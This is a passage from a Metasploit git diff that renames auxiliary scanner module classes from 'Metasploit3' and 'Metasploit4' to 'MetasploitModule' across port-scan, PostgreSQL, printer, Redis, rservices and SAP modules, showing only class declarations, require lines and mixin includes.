a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index b59ee5c028..2455423ec4 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index 299c1210af..857d61f11e 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index 8f64a84695..a09a65cc48 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb index 9e48bfc0ec..12c8177688 100644 --- a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb +++ b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb index a4c3066cfb..ddbf1a926b 100644 --- a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb index 9c2d96dc71..5c5bf308d3 100644 --- a/modules/auxiliary/scanner/postgres/postgres_login.rb +++ b/modules/auxiliary/scanner/postgres/postgres_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/postgres' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb index b42313a194..59915acedc 100644 --- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index 8a2bea7d9c..d8e6036db0 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_delete_file.rb b/modules/auxiliary/scanner/printer/printer_delete_file.rb index 4b561b4877..6dc859651d 100644 --- a/modules/auxiliary/scanner/printer/printer_delete_file.rb +++ b/modules/auxiliary/scanner/printer/printer_delete_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_download_file.rb b/modules/auxiliary/scanner/printer/printer_download_file.rb index 64c04d999d..4e4f2293e7 100644 --- a/modules/auxiliary/scanner/printer/printer_download_file.rb +++ b/modules/auxiliary/scanner/printer/printer_download_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_env_vars.rb b/modules/auxiliary/scanner/printer/printer_env_vars.rb index c1546ccb66..884764477b 100644 --- a/modules/auxiliary/scanner/printer/printer_env_vars.rb +++ b/modules/auxiliary/scanner/printer/printer_env_vars.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_list_dir.rb b/modules/auxiliary/scanner/printer/printer_list_dir.rb index 49f70ec717..068705657a 100644 --- a/modules/auxiliary/scanner/printer/printer_list_dir.rb +++ b/modules/auxiliary/scanner/printer/printer_list_dir.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_list_volumes.rb b/modules/auxiliary/scanner/printer/printer_list_volumes.rb index d596504844..4d6e01235e 100644 --- a/modules/auxiliary/scanner/printer/printer_list_volumes.rb +++ b/modules/auxiliary/scanner/printer/printer_list_volumes.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_ready_message.rb b/modules/auxiliary/scanner/printer/printer_ready_message.rb index 610a1f6bb4..10445e7ffd 100644 --- a/modules/auxiliary/scanner/printer/printer_ready_message.rb +++ b/modules/auxiliary/scanner/printer/printer_ready_message.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_upload_file.rb b/modules/auxiliary/scanner/printer/printer_upload_file.rb index 3f0fe0229e..3971e8b1cf 100644 --- a/modules/auxiliary/scanner/printer/printer_upload_file.rb +++ b/modules/auxiliary/scanner/printer/printer_upload_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_version_info.rb b/modules/auxiliary/scanner/printer/printer_version_info.rb index 5171a46a3c..d23312a60e 100644 --- a/modules/auxiliary/scanner/printer/printer_version_info.rb +++ b/modules/auxiliary/scanner/printer/printer_version_info.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/quake/server_info.rb b/modules/auxiliary/scanner/quake/server_info.rb index f8012e7a4c..f0a4e2b0e4 100644 --- a/modules/auxiliary/scanner/quake/server_info.rb +++ b/modules/auxiliary/scanner/quake/server_info.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/quake' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Rex::Proto::Quake diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index f9174649d9..8d358d88a2 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/redis/file_upload.rb b/modules/auxiliary/scanner/redis/file_upload.rb index 3842aea864..fcdf313df9 100644 --- a/modules/auxiliary/scanner/redis/file_upload.rb +++ b/modules/auxiliary/scanner/redis/file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Redis def initialize(info = {}) diff --git a/modules/auxiliary/scanner/redis/redis_server.rb b/modules/auxiliary/scanner/redis/redis_server.rb index 6d91606685..eeabe3890c 100644 --- a/modules/auxiliary/scanner/redis/redis_server.rb +++ b/modules/auxiliary/scanner/redis/redis_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Redis include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/rogue/rogue_recv.rb b/modules/auxiliary/scanner/rogue/rogue_recv.rb index 4293d6bc1e..9b8dbe95d7 100644 --- a/modules/auxiliary/scanner/rogue/rogue_recv.rb +++ b/modules/auxiliary/scanner/rogue/rogue_recv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/rogue/rogue_send.rb b/modules/auxiliary/scanner/rogue/rogue_send.rb index 9e2b9cf3ec..6c50275f34 100644 --- a/modules/auxiliary/scanner/rogue/rogue_send.rb +++ b/modules/auxiliary/scanner/rogue/rogue_send.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/rservices/rexec_login.rb b/modules/auxiliary/scanner/rservices/rexec_login.rb index f2a93ecf5a..9a1e4d7c83 100644 --- a/modules/auxiliary/scanner/rservices/rexec_login.rb +++ b/modules/auxiliary/scanner/rservices/rexec_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rservices/rlogin_login.rb b/modules/auxiliary/scanner/rservices/rlogin_login.rb index 7d1414a6d6..1ef454e273 100644 --- a/modules/auxiliary/scanner/rservices/rlogin_login.rb +++ b/modules/auxiliary/scanner/rservices/rlogin_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rservices/rsh_login.rb b/modules/auxiliary/scanner/rservices/rsh_login.rb index 8892b023d5..aac1d57444 100644 --- a/modules/auxiliary/scanner/rservices/rsh_login.rb +++ b/modules/auxiliary/scanner/rservices/rsh_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rsync/modules_list.rb b/modules/auxiliary/scanner/rsync/modules_list.rb index 9bdfaaf4f5..ff68f8f088 100644 --- a/modules/auxiliary/scanner/rsync/modules_list.rb +++ b/modules/auxiliary/scanner/rsync/modules_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb index 3bff4eaa56..b93b5dd456 100644 --- a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb +++ b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb b/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb index 7865397e71..5acb133b6b 100644 --- a/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb +++ b/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb index 05ca2b7f4c..146a919d95 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 7cea619121..1e9e63aa2e 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb index f87e2d65f3..3a300ad761 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index 57af398132..114d6758d9 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb index b1d033363b..fb3a9571bb 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb index 1333c69ff8..ee9957196f 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb index 15868dd886..7d4b52b594 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb index ccf26867ad..0081f81978 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb index d48d7dfd8b..6747e7263c 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index a6027450f4..3f4cc9ebf3 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb index bb443cf0b6..76ab9d2360 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb index f950718dba..d1d26c469f 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb index 43a943d552..27e3600b01 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb index 34c51c9eba..5f835712b5 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_router_info_request.rb b/modules/auxiliary/scanner/sap/sap_router_info_request.rb index c87f04e5b8..1edd8fdae9 100644 --- a/modules/auxiliary/scanner/sap/sap_router_info_request.rb +++ b/modules/auxiliary/scanner/sap/sap_router_info_request.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index 79f9882999..d22432a080 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_service_discovery.rb b/modules/auxiliary/scanner/sap/sap_service_discovery.rb index fa77142694..47921cdf7d 100644 --- a/modules/auxiliary/scanner/sap/sap_service_discovery.rb +++ b/modules/auxiliary/scanner/sap/sap_service_discovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_smb_relay.rb b/modules/auxiliary/scanner/sap/sap_smb_relay.rb index 3c832996bf..fb43861d0c 100644 --- a/modules/auxiliary/scanner/sap/sap_smb_relay.rb +++ b/modules/auxiliary/scanner/sap/sap_smb_relay.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 1ae343ea5b..72033622a3 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb index 1febb6b023..f170841f30 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb index cd8e52f1ee..fe280f2599 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb index 05bbe78ec4..567db4db73 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb index 1658e8688d..3946cdc795 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb index 1547c002aa..2a5dc93882 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb index 95a48c4de8..f8572c005c 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb index f699e19db8..d7ee3ed5a9 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb index e751c8e3cb..4a78406fc9 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb @@ -23,7 +23,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb index 833901c516..21c1d4caba 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 0091f41be4..6946dff925 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb index 0480f0b23d..1302852087 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class 